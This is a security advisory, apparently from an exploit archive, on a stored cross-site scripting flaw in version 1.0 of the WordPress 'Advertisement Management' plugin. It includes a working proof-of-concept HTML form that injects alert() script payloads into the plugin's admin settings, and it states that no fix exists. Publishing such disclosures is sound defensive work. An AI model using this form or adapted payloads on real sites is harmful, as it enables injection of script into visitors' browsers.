WordPress Advertisement Management 1.0 Cross Site Scripting Vulnerability

Full Baslik	WordPress Advertisement Management 1.0 Cross Site Scripting Vulnerability
Eklenme Tarihi	04-08-2015
Kategori	web applications
Platform	php
Risk	Security Risk Low

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44

Title: WordPress 'Advertisement Management' Plugin Version: 1.0 Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej Date: 2015-06-16 Download: - https://wordpress.org/plugins/advertisement-management/ - https://plugins.svn.wordpress.org/advertisement-management/ Notified WordPress: 2015-06-21 ==========================================================   ## Plugin description ========================================================== Advertisement Management lets you administrate all the blog advertisements diretctly from the blog backend.   ## XSS/CSRF vulnerabilities ========================================================== The settings on the admin page is vulnerable to XSS.   PoC: Log in as admin and submit the this form   <form method="POST" action="[URL]/wp-admin/options-general.php?page=Advertising_page&action=update"> <input type="text" name="Advertising_front_page" value="</textarea><script>alert(1)</script>"><br /> <input type="text" name="Advertising_single_top" value="</textarea><script>alert(2)</script>"><br /> <input type="text" name="Advertising_single_bottom" value="</textarea><script>alert(3)</script>"><br /> <input type="text" name="Advertising_page_top" value="</textarea><script>alert(4)</script>"><br /> <input type="text" name="Advertising_page_bottom" value="</textarea><script>alert(5)</script>"><br /> <input type="text" name="Advertising_below_commentbox" value="</textarea><script>alert(6)</script>"><br /> <input type="text" name="Advertising_blog_top" value="</textarea><script>alert(7)</script>"><br /> <input type="text" name="Advertising_below_footer" value="</textarea><script>alert(8)</script>"><br /> <input type="submit"> </form>   After having done this, some of the injected scripts will be executed when loading the front page of the site.   ## Solution ========================================================== No fix available   ========================================================== XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.   # 0day.today [2015-08-04] # fb.com/inj3ct0rs and twitter.com/inj3ct0r